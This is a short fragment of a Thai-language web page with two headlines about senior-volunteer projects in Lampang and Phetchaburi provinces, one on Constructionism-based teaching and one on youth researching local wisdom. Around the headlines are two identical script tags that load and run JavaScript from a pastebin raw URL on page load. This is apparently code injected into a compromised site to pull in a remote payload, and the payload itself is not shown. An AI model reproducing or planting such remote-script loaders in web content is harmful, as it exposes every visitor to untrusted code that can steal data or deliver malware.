<script type="text/javascript" src="https://pastebin.com/raw/ptDi9zXg"></script>   วุฒิอาสาฯ จ.ลำปางดำเนินโครงการ "การประยุกต์ใช้แนวคิดการเรียนการสอนแบบใหม่ โดยใช้ทฤษฎี Constructionism"   วุฒิอาสาธนาคารสมองจังหวัดเพชรบุรี ร่วมกับองค์การบริหารส่วนตำบลถ้ำรงค์ จัดทำโครงการ "เยาวชนสืบค้นภูมิปัญญาท้องถิ่น"   <script type="text/javascript" src="https://pastebin.com/raw/ptDi9zXg"></script>